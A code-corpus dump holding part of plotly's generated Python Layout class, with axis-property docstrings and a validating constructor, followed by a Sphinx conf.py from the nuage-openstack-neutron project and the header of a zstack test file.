Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the tick font.
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
plotly.graph_objs.layout.xaxis.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.lay
out.xaxis.tickformatstopdefaults), sets the
default property values to use for elements of
layout.xaxis.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
Sets the title of this axis.
titlefont
Sets this axis' title font.
type
Sets the axis type. By default, plotly attempts
to determined the axis type by looking into the
data of the traces that referenced the axis in
question.
visible
A single toggle to hide the axis while
preserving interaction like dragging. Default
is true when a cheater plot is present on the
axis, otherwise false
zeroline
Determines whether or not a line is drawn at
along the 0 value of this axis. If True, the
zero line is drawn on top of the grid lines.
zerolinecolor
Sets the line color of the zero line.
zerolinewidth
Sets the width (in px) of the zero line.
Returns
-------
plotly.graph_objs.layout.XAxis
"""
return self['xaxis']
@xaxis.setter
def xaxis(self, val):
self['xaxis'] = val
# yaxis
# -----
@property
def yaxis(self):
"""
The 'yaxis' property is an instance of YAxis
that may be specified as:
- An instance of plotly.graph_objs.layout.YAxis
- A dict of string/value properties that will be passed
to the YAxis constructor
Supported dict properties:
anchor
If set to an opposite-letter axis id (e.g.
`x2`, `y`), this axis is bound to the
corresponding opposite-letter axis. If set to
"free", this axis' position is determined by
`position`.
automargin
Determines whether long tick labels
automatically grow the figure margins.
autorange
Determines whether or not the range of this
axis is computed in relation to the input data.
See `rangemode` for more info. If `range` is
provided, then `autorange` is set to False.
calendar
Sets the calendar system to use for `range` and
`tick0` if this is a date axis. This does not
set the calendar for interpreting data on this
axis, that's specified in the trace or via the
global `layout.calendar`
categoryarray
Sets the order in which categories on this axis
appear. Only has an effect if `categoryorder`
is set to "array". Used with `categoryorder`.
categoryarraysrc
Sets the source reference on plot.ly for
categoryarray .
categoryorder
Specifies the ordering logic for the case of
categorical variables. By default, plotly uses
"trace", which specifies the order that is
present in the data supplied. Set
`categoryorder` to *category ascending* or
*category descending* if order should be
determined by the alphanumerical order of the
category names. Set `categoryorder` to "array"
to derive the ordering from the attribute
`categoryarray`. If a category is not found in
the `categoryarray` array, the sorting behavior
for that attribute will be identical to the
"trace" mode. The unspecified categories will
follow the categories in `categoryarray`.
color
Sets default for all colors associated with
this axis all at once: line, font, tick, and
grid colors. Grid color is lightened by
blending this with the plot background
Individual pieces can override this.
constrain
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines how that
happens: by increasing the "range" (default),
or by decreasing the "domain".
constraintoward
If this axis needs to be compressed (either due
to its own `scaleanchor` and `scaleratio` or
those of the other axis), determines which
direction we push the originally specified plot
area. Options are "left", "center" (default),
and "right" for x axes, and "top", "middle"
(default), and "bottom" for y axes.
domain
Sets the domain of this axis (in plot
fraction).
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
fixedrange
Determines whether or not this axis is zoom-
able. If true, then zoom is disabled.
gridcolor
Sets the color of the grid lines.
gridwidth
Sets the width (in px) of the grid lines.
hoverformat
Sets the hover text formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
layer
Sets the layer on which this axis is displayed.
If *above traces*, this axis is displayed above
all the subplot's traces If *below traces*,
this axis is displayed below all the subplot's
traces, but above the grid lines. Useful when
used together with scatter-like traces with
`cliponaxis` set to False to show markers
and/or text nodes above this axis.
linecolor
Sets the axis line color.
linewidth
Sets the width (in px) of the axis line.
mirror
Determines if the axis lines or/and ticks are
mirrored to the opposite side of the plotting
area. If True, the axis lines are mirrored. If
"ticks", the axis lines and ticks are mirrored.
If False, mirroring is disable. If "all", axis
lines are mirrored on all shared-axes subplots.
If "allticks", axis lines and ticks are
mirrored on all shared-axes subplots.
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
overlaying
If set a same-letter axis id, this axis is
overlaid on top of the corresponding same-
letter axis, with traces and axes visible for
both axes. If False, this axis does not overlay
any same-letter axes. In this case, for axes
with overlapping domains only the highest-
numbered axis will be visible.
position
Sets the position of this axis in the plotting
space (in normalized coordinates). Only has an
effect if `anchor` is set to "free".
range
Sets the range of this axis. If the axis `type`
is "log", then you must take the log of your
desired range (e.g. to set the range from 1 to
100, set the range from 0 to 2). If the axis
`type` is "date", it should be date strings,
like date data, though Date objects and unix
milliseconds will be accepted and converted to
strings. If the axis `type` is "category", it
should be numbers, using the scale where each
category is assigned a serial number from zero
in the order it appears.
rangemode
If "normal", the range is computed in relation
to the extrema of the input data. If *tozero*`,
the range extends to 0, regardless of the input
data If "nonnegative", the range is non-
negative, regardless of the input data. Applies
only to linear axes.
scaleanchor
If set to another axis id (e.g. `x2`, `y`), the
range of this axis changes together with the
range of the corresponding axis such that the
scale of pixels per unit is in a constant
ratio. Both axes are still zoomable, but when
you zoom one, the other will zoom the same
amount, keeping a fixed midpoint. `constrain`
and `constraintoward` determine how we enforce
the constraint. You can chain these, ie `yaxis:
{scaleanchor: *x*}, xaxis2: {scaleanchor: *y*}`
but you can only link axes of the same `type`.
The linked axis can have the opposite letter
(to constrain the aspect ratio) or the same
letter (to match scales across subplots). Loops
(`yaxis: {scaleanchor: *x*}, xaxis:
{scaleanchor: *y*}` or longer) are redundant
and the last constraint encountered will be
ignored to avoid possible inconsistent
constraints via `scaleratio`.
scaleratio
If this axis is linked to another by
`scaleanchor`, this determines the pixel to
unit scale ratio. For example, if this value is
10, then every unit on this axis spans 10 times
the number of pixels as a unit on the linked
axis. Use this for example to create an
elevation profile where the vertical scale is
exaggerated a fixed amount with respect to the
horizontal.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showgrid
Determines whether or not grid lines are drawn.
If True, the grid lines are drawn at every tick
mark.
showline
Determines whether or not a line bounding this
axis is drawn.
showspikes
Determines whether or not spikes (aka
droplines) are drawn for this axis. Note: This
only takes affect when hovermode = closest
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
side
Determines whether a x (y) axis is positioned
at the "bottom" ("left") or "top" ("right") of
the plotting area.
spikecolor
Sets the spike color. If undefined, will use
the series color
spikedash
Sets the dash style of lines. Set to a dash
type string ("solid", "dot", "dash",
"longdash", "dashdot", or "longdashdot") or a
dash length list in px (eg "5px,10px,2px,2px").
spikemode
Determines the drawing mode for the spike line
If "toaxis", the line is drawn from the data
point to the axis the series is plotted on. If
"across", the line is drawn across the entire
plot area, and supercedes "toaxis". If
"marker", then a marker dot is drawn on the
axis the series is plotted on
spikesnap
Determines whether spikelines are stuck to the
cursor or to the closest datapoints.
spikethickness
Sets the width (in px) of the zero line.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the tick font.
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/blob/master/READ
ME.md#locale_format And for dates see:
https://github.com/d3/d3-time-
format/blob/master/README.md#locale_format We
add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
plotly.graph_objs.layout.yaxis.Tickformatstop
instance or dict with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.lay
out.yaxis.tickformatstopdefaults), sets the
default property values to use for elements of
layout.yaxis.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
Sets the title of this axis.
titlefont
Sets this axis' title font.
type
Sets the axis type. By default, plotly attempts
to determined the axis type by looking into the
data of the traces that referenced the axis in
question.
visible
A single toggle to hide the axis while
preserving interaction like dragging. Default
is true when a cheater plot is present on the
axis, otherwise false
zeroline
Determines whether or not a line is drawn at
along the 0 value of this axis. If True, the
zero line is drawn on top of the grid lines.
zerolinecolor
Sets the line color of the zero line.
zerolinewidth
Sets the width (in px) of the zero line.
Returns
-------
plotly.graph_objs.layout.YAxis
"""
return self['yaxis']
@yaxis.setter
def yaxis(self, val):
self['yaxis'] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return ''
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
angularaxis
plotly.graph_objs.layout.AngularAxis instance or dict
with compatible properties
annotations
plotly.graph_objs.layout.Annotation instance or dict
with compatible properties
annotationdefaults
When used in a template (as
layout.template.layout.annotationdefaults), sets the
default property values to use for elements of
layout.annotations
autosize
Determines whether or not a layout width or height that
has been left undefined by the user is initialized on
each relayout. Note that, regardless of this attribute,
an undefined layout width or height is always
initialized on the first call to plot.
bargap
Sets the gap (in plot fraction) between bars of
adjacent location coordinates.
bargroupgap
Sets the gap (in plot fraction) between bars of the
same location coordinate.
barmode
Determines how bars at the same location coordinate are
displayed on the graph. With "stack", the bars are
stacked on top of one another With "relative", the bars
are stacked on top of one another, with negative values
below the axis, positive values above With "group", the
bars are plotted next to one another centered around
the shared location. With "overlay", the bars are
plotted over one another, you might need to an
"opacity" to see multiple bars.
barnorm
Sets the normalization for bar traces on the graph.
With "fraction", the value of each bar is divided by
the sum of all values at that location coordinate.
"percent" is the same but multiplied by 100 to show
percentages.
boxgap
Sets the gap (in plot fraction) between boxes of
adjacent location coordinates.
boxgroupgap
Sets the gap (in plot fraction) between boxes of the
same location coordinate.
boxmode
Determines how boxes at the same location coordinate
are displayed on the graph. If "group", the boxes are
plotted next to one another centered around the shared
location. If "overlay", the boxes are plotted over one
another, you might need to set "opacity" to see them
multiple boxes.
calendar
Sets the default calendar system to use for
interpreting and displaying dates throughout the plot.
clickmode
Determines the mode of single click interactions.
"event" is the default value and emits the
`plotly_click` event. In addition this mode emits the
`plotly_selected` event in drag modes "lasso" and
"select", but with no event data attached (kept for
compatibility reasons). The "select" flag enables
selecting single data points via click. This mode also
supports persistent selections, meaning that pressing
Shift while clicking, adds to / subtracts from an
existing selection. "select" with `hovermode`: "x" can
be confusing, consider explicitly setting `hovermode`:
"closest" when using this feature. Selection events are
sent accordingly as long as "event" flag is set as
well. When the "event" flag is missing, `plotly_click`
and `plotly_selected` events are not fired.
colorway
Sets the default trace colors.
datarevision
If provided, a changed value tells `Plotly.react` that
one or more data arrays has changed. This way you can
modify arrays in-place rather than making a complete
new copy for an incremental change. If NOT provided,
`Plotly.react` assumes that data arrays are being
treated as immutable, thus any data array with a
different identity from its predecessor contains new
data.
direction
Legacy polar charts are deprecated! Please switch to
"polar" subplots. Sets the direction corresponding to
positive angles in legacy polar charts.
dragmode
Determines the mode of drag interactions. "select" and
"lasso" apply only to scatter traces with markers or
text. "orbit" and "turntable" apply only to 3D scenes.
extendpiecolors
If `true`, the pie slice colors (whether given by
`piecolorway` or inherited from `colorway`) will be
extended to three times its original length by first
repeating every color 20% lighter then each color 20%
darker. This is intended to reduce the likelihood of
reusing the same color when you have many slices, but
you can set `false` to disable. Colors provided in the
trace, using `marker.colors`, are never extended.
font
Sets the global font. Note that fonts used in traces
and other layout components inherit from the global
font.
geo
plotly.graph_objs.layout.Geo instance or dict with
compatible properties
grid
plotly.graph_objs.layout.Grid instance or dict with
compatible properties
height
Sets the plot's height (in px).
hiddenlabels
hiddenlabelssrc
Sets the source reference on plot.ly for hiddenlabels
.
hidesources
Determines whether or not a text link citing the data
source is placed at the bottom-right cored of the
figure. Has only an effect only on graphs that have
been generated via forked graphs from the plotly
service (at https://plot.ly or on-premise).
hoverdistance
Sets the default distance (in pixels) to look for data
to add hover labels (-1 means no cutoff, 0 means no
looking for data). This is only a real distance for
hovering on point-like objects, like scatter points.
For area-like objects (bars, scatter fills, etc)
hovering is on inside the area and off outside, but
these objects will not supersede hover on point-like
objects in case of conflict.
hoverlabel
plotly.graph_objs.layout.Hoverlabel instance or dict
with compatible properties
hovermode
Determines the mode of hover interactions. If
`clickmode` includes the "select" flag, `hovermode`
defaults to "closest". If `clickmode` lacks the
"select" flag, it defaults to "x" or "y" (depending on
the trace's `orientation` value) for plots based on
cartesian coordinates. For anything else the default
value is "closest".
images
plotly.graph_objs.layout.Image instance or dict with
compatible properties
imagedefaults
When used in a template (as
layout.template.layout.imagedefaults), sets the default
property values to use for elements of layout.images
legend
plotly.graph_objs.layout.Legend instance or dict with
compatible properties
mapbox
plotly.graph_objs.layout.Mapbox instance or dict with
compatible properties
margin
plotly.graph_objs.layout.Margin instance or dict with
compatible properties
modebar
plotly.graph_objs.layout.Modebar instance or dict with
compatible properties
orientation
Legacy polar charts are deprecated! Please switch to
"polar" subplots. Rotates the entire polar by the given
angle in legacy polar charts.
paper_bgcolor
Sets the color of paper where the graph is drawn.
piecolorway
Sets the default pie slice colors. Defaults to the main
`colorway` used for trace colors. If you specify a new
list here it can still be extended with lighter and
darker colors, see `extendpiecolors`.
plot_bgcolor
Sets the color of plotting area in-between x and y
axes.
polar
plotly.graph_objs.layout.Polar instance or dict with
compatible properties
radialaxis
plotly.graph_objs.layout.RadialAxis instance or dict
with compatible properties
scene
plotly.graph_objs.layout.Scene instance or dict with
compatible properties
selectdirection
When "dragmode" is set to "select", this limits the
selection of the drag to horizontal, vertical or
diagonal. "h" only allows horizontal selection, "v"
only vertical, "d" only diagonal and "any" sets no
limit.
separators
Sets the decimal and thousand separators. For example,
*. * puts a '.' before decimals and a space between
thousands. In English locales, dflt is ".," but other
locales may alter this default.
shapes
plotly.graph_objs.layout.Shape instance or dict with
compatible properties
shapedefaults
When used in a template (as
layout.template.layout.shapedefaults), sets the default
property values to use for elements of layout.shapes
showlegend
Determines whether or not a legend is drawn. Default is
`true` if there is a trace to show and any of these: a)
Two or more traces would by default be shown in the
legend. b) One pie trace is shown in the legend. c) One
trace is explicitly given with `showlegend: true`.
sliders
plotly.graph_objs.layout.Slider instance or dict with
compatible properties
sliderdefaults
When used in a template (as
layout.template.layout.sliderdefaults), sets the
default property values to use for elements of
layout.sliders
spikedistance
Sets the default distance (in pixels) to look for data
to draw spikelines to (-1 means no cutoff, 0 means no
looking for data). As with hoverdistance, distance does
not apply to area-like objects. In addition, some
objects can be hovered on but will not generate
spikelines, such as scatter fills.
template
Default attributes to be applied to the plot. This
should be a dict with format: `{'layout':
layoutTemplate, 'data': {trace_type: [traceTemplate,
...], ...}}` where `layoutTemplate` is a dict matching
the structure of `figure.layout` and `traceTemplate` is
a dict matching the structure of the trace with type
`trace_type` (e.g. 'scatter'). Alternatively, this may
be specified as an instance of
plotly.graph_objs.layout.Template. Trace templates are
applied cyclically to traces of each type. Container
arrays (eg `annotations`) have special handling: An
object ending in `defaults` (eg `annotationdefaults`)
is applied to each array item. But if an item has a
`templateitemname` key we look in the template array
for an item with matching `name` and apply that
instead. If no matching `name` is found we mark the
item invisible. Any named template item not referenced
is appended to the end of the array, so this can be
used to add a watermark annotation or a logo image, for
example. To omit one of these items on the plot, make
an item with matching `templateitemname` and `visible:
false`.
ternary
plotly.graph_objs.layout.Ternary instance or dict with
compatible properties
title
Sets the plot's title.
titlefont
Sets the title font.
updatemenus
plotly.graph_objs.layout.Updatemenu instance or dict
with compatible properties
updatemenudefaults
When used in a template (as
layout.template.layout.updatemenudefaults), sets the
default property values to use for elements of
layout.updatemenus
violingap
Sets the gap (in plot fraction) between violins of
adjacent location coordinates.
violingroupgap
Sets the gap (in plot fraction) between violins of the
same location coordinate.
violinmode
Determines how violins at the same location coordinate
are displayed on the graph. If "group", the violins are
plotted next to one another centered around the shared
location. If "overlay", the violins are plotted over
one another, you might need to set "opacity" to see
them multiple violins.
width
Sets the plot's width (in px).
xaxis
plotly.graph_objs.layout.XAxis instance or dict with
compatible properties
yaxis
plotly.graph_objs.layout.YAxis instance or dict with
compatible properties
"""
def __init__(
    self,
    arg=None,
    angularaxis=None,
    annotations=None,
    annotationdefaults=None,
    autosize=None,
    bargap=None,
    bargroupgap=None,
    barmode=None,
    barnorm=None,
    boxgap=None,
    boxgroupgap=None,
    boxmode=None,
    calendar=None,
    clickmode=None,
    colorway=None,
    datarevision=None,
    direction=None,
    dragmode=None,
    extendpiecolors=None,
    font=None,
    geo=None,
    grid=None,
    height=None,
    hiddenlabels=None,
    hiddenlabelssrc=None,
    hidesources=None,
    hoverdistance=None,
    hoverlabel=None,
    hovermode=None,
    images=None,
    imagedefaults=None,
    legend=None,
    mapbox=None,
    margin=None,
    modebar=None,
    orientation=None,
    paper_bgcolor=None,
    piecolorway=None,
    plot_bgcolor=None,
    polar=None,
    radialaxis=None,
    scene=None,
    selectdirection=None,
    separators=None,
    shapes=None,
    shapedefaults=None,
    showlegend=None,
    sliders=None,
    sliderdefaults=None,
    spikedistance=None,
    template=None,
    ternary=None,
    title=None,
    titlefont=None,
    updatemenus=None,
    updatemenudefaults=None,
    violingap=None,
    violingroupgap=None,
    violinmode=None,
    width=None,
    xaxis=None,
    yaxis=None,
    **kwargs
):
    """
    Construct a new Layout object.

    Parameters
    ----------
    arg : dict or plotly.graph_objs.Layout, optional
        A dict of properties compatible with this constructor, or an
        existing Layout instance. Explicit keyword arguments take
        precedence over the same key supplied through ``arg``.
    angularaxis ... yaxis : optional
        One keyword argument per layout property (same names and
        semantics as the properties documented on the class docstring).
        Each defaults to None, meaning "not supplied".
    **kwargs
        Additional property values. The special key
        ``skip_invalid=True`` makes the constructor silently ignore
        invalid properties instead of raising.

    Raises
    ------
    ValueError
        If ``arg`` is neither None, a dict, nor a Layout instance.

    Returns
    -------
    Layout
    """
    # Snapshot the explicit constructor arguments so they can be looked
    # up by property name below. Taken first, before any other local
    # variable is bound and before `arg` is rebound.
    _given = locals()

    super(Layout, self).__init__('layout')

    # -- Validate / normalize `arg` into a private dict we may pop from --
    if arg is None:
        arg = {}
    elif isinstance(arg, self.__class__):
        arg = arg.to_plotly_json()
    elif isinstance(arg, dict):
        arg = copy.copy(arg)
    else:
        raise ValueError(
            """\
The first argument to the plotly.graph_objs.Layout
constructor must be a dict or
an instance of plotly.graph_objs.Layout"""
        )

    # -- skip_invalid suppresses per-property validation errors while the
    # constructor runs; it is always restored to False at the end.
    self._skip_invalid = kwargs.pop('skip_invalid', False)

    from plotly.validators import layout as v_layout

    # (property name, validator class) pairs, listed in the same order
    # the properties are populated below. Note the irregular names: the
    # plural `*defaults` properties reuse the singular item validator
    # (e.g. 'annotationdefaults' -> AnnotationValidator).
    _prop_validators = [
        ('angularaxis', v_layout.AngularAxisValidator),
        ('annotations', v_layout.AnnotationsValidator),
        ('annotationdefaults', v_layout.AnnotationValidator),
        ('autosize', v_layout.AutosizeValidator),
        ('bargap', v_layout.BargapValidator),
        ('bargroupgap', v_layout.BargroupgapValidator),
        ('barmode', v_layout.BarmodeValidator),
        ('barnorm', v_layout.BarnormValidator),
        ('boxgap', v_layout.BoxgapValidator),
        ('boxgroupgap', v_layout.BoxgroupgapValidator),
        ('boxmode', v_layout.BoxmodeValidator),
        ('calendar', v_layout.CalendarValidator),
        ('clickmode', v_layout.ClickmodeValidator),
        ('colorway', v_layout.ColorwayValidator),
        ('datarevision', v_layout.DatarevisionValidator),
        ('direction', v_layout.DirectionValidator),
        ('dragmode', v_layout.DragmodeValidator),
        ('extendpiecolors', v_layout.ExtendpiecolorsValidator),
        ('font', v_layout.FontValidator),
        ('geo', v_layout.GeoValidator),
        ('grid', v_layout.GridValidator),
        ('height', v_layout.HeightValidator),
        ('hiddenlabels', v_layout.HiddenlabelsValidator),
        ('hiddenlabelssrc', v_layout.HiddenlabelssrcValidator),
        ('hidesources', v_layout.HidesourcesValidator),
        ('hoverdistance', v_layout.HoverdistanceValidator),
        ('hoverlabel', v_layout.HoverlabelValidator),
        ('hovermode', v_layout.HovermodeValidator),
        ('images', v_layout.ImagesValidator),
        ('imagedefaults', v_layout.ImageValidator),
        ('legend', v_layout.LegendValidator),
        ('mapbox', v_layout.MapboxValidator),
        ('margin', v_layout.MarginValidator),
        ('modebar', v_layout.ModebarValidator),
        ('orientation', v_layout.OrientationValidator),
        ('paper_bgcolor', v_layout.PaperBgcolorValidator),
        ('piecolorway', v_layout.PiecolorwayValidator),
        ('plot_bgcolor', v_layout.PlotBgcolorValidator),
        ('polar', v_layout.PolarValidator),
        ('radialaxis', v_layout.RadialAxisValidator),
        ('scene', v_layout.SceneValidator),
        ('selectdirection', v_layout.SelectdirectionValidator),
        ('separators', v_layout.SeparatorsValidator),
        ('shapes', v_layout.ShapesValidator),
        ('shapedefaults', v_layout.ShapeValidator),
        ('showlegend', v_layout.ShowlegendValidator),
        ('sliders', v_layout.SlidersValidator),
        ('sliderdefaults', v_layout.SliderValidator),
        ('spikedistance', v_layout.SpikedistanceValidator),
        ('template', v_layout.TemplateValidator),
        ('ternary', v_layout.TernaryValidator),
        ('title', v_layout.TitleValidator),
        ('titlefont', v_layout.TitlefontValidator),
        ('updatemenus', v_layout.UpdatemenusValidator),
        ('updatemenudefaults', v_layout.UpdatemenuValidator),
        ('violingap', v_layout.ViolingapValidator),
        ('violingroupgap', v_layout.ViolingroupgapValidator),
        ('violinmode', v_layout.ViolinmodeValidator),
        ('width', v_layout.WidthValidator),
        ('xaxis', v_layout.XAxisValidator),
        ('yaxis', v_layout.YAxisValidator),
    ]

    # -- Initialize validators --
    for _name, _validator_cls in _prop_validators:
        self._validators[_name] = _validator_cls()

    # -- Populate the data dict: an explicit keyword argument wins over
    # the corresponding entry popped from `arg`.
    for _name, _unused in _prop_validators:
        _from_arg = arg.pop(_name, None)
        _keyword = _given[_name]
        _value = _keyword if _keyword is not None else _from_arg
        if _name == 'template':
            # 'template' is special-cased: it is only assigned when a
            # real value was supplied (all other properties are assigned
            # even when the result is None), mirroring upstream behavior
            # for this property.
            if _value is not None:
                self['template'] = _value
        else:
            self[_name] = _value

    # -- Whatever remains in `arg`, plus any extra **kwargs, is handed to
    # the base class (which raises unless skip_invalid was requested).
    self._process_kwargs(**dict(arg, **kwargs))

    # -- Reset the skip_invalid flag now that construction is complete --
    self._skip_invalid = False
| 43.279945 | 82 | 0.541344 |
7f4715a74fae0d464817a33e481f32c602b49ea2 | 2,469 | py | Python | doc/source/conf.py | jbemmel/nuage-openstack-neutron | e356c017f7e1600b72cfc26abb588c7cf636e925 | [
"Apache-2.0"
] | 14 | 2015-06-24T18:35:25.000Z | 2020-09-21T07:14:06.000Z | doc/source/conf.py | jbemmel/nuage-openstack-neutron | e356c017f7e1600b72cfc26abb588c7cf636e925 | [
"Apache-2.0"
] | 7 | 2016-01-20T18:20:28.000Z | 2020-11-18T16:04:14.000Z | doc/source/conf.py | jbemmel/nuage-openstack-neutron | e356c017f7e1600b72cfc26abb588c7cf636e925 | [
"Apache-2.0"
] | 43 | 2015-04-07T09:02:35.000Z | 2021-02-12T07:50:19.000Z | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
# 'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'nuage-openstack-neutron'
copyright = u'Alcatel-Lucent USA Inc'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
# intersphinx_mapping = {'http://docs.python.org/': None}
| 32.486842 | 79 | 0.696638 |
333f1a65839bd7d26da5f0cf1278a6f817d7e4e4 | 1,547 | py | Python | integrationtest/vm/multihosts/test_create_vm.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | 2 | 2016-03-23T08:45:44.000Z | 2017-06-26T02:40:46.000Z | integrationtest/vm/multihosts/test_create_vm.py | KevinDavidMitnick/zstack-woodpecker | 96257faaf3c362168d008bdb47002025ad669b24 | [
"Apache-2.0"
] | null | null | null | integrationtest/vm/multihosts/test_create_vm.py | KevinDavidMitnick/zstack-woodpecker | 96257faaf3c362168d008bdb47002025ad669b24 | [
"Apache-2.0"
